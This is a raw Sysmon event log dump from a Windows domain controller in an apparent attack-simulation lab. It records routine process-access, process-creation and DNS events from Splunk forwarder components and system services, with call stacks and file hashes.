13:36:46.642{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004257Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:46.642{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004256Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:46.642{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004255Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:46.642{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004254Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:46.642{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004253Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:46.642{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004252Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:46.642{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004251Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:46.642{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004250Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:46.642{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004249Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:46.642{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8EEE-6005-E400-00000000A301}880C:\Program Files\SplunkUniversalForwarder\bin\splunk-perfmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004248Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:46.642{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8EEE-6005-E400-00000000A301}880C:\Program Files\SplunkUniversalForwarder\bin\splunk-perfmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004247Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:46.643{59A5CD1D-8EEE-6005-E400-00000000A301}880C:\Program Files\SplunkUniversalForwarder\bin\splunk-perfmon.exe8.0.2Performance monitorsplunk ApplicationSplunk Inc.splunk-perfmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-perfmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=1F3027C93882E5D5A667B84CCEF3ED67,SHA256=504CDB3742BCBF617C837270CCEC0243205B7BF0A6AB5117EFB838DD2F004AAC,IMPHASH=53D37CD53647C5D82FCFA9E6970E154E{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 22542200x80000000000000004246Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:43.888{59A5CD1D-8EEB-6005-DF00-00000000A301}3544win-dc-4950fe80::16d:d52:d54:cffc;::ffff:10.0.1.14;C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe 10341000x80000000000000004287Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:47.986{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EEF-6005-E600-00000000A301}4312C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004286Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:47.986{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004285Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:47.986{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004284Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:47.986{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004283Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:47.986{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004282Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:47.986{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004281Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:47.986{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004280Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:47.986{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004279Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:47.986{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004278Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:47.986{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004277Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:47.986{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8EEF-6005-E600-00000000A301}4312C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004276Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:47.986{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8EEF-6005-E600-00000000A301}4312C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004275Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:47.987{59A5CD1D-8EEF-6005-E600-00000000A301}4312C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004274Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:47.455{59A5CD1D-8EEF-6005-E500-00000000A301}7481408C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004273Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 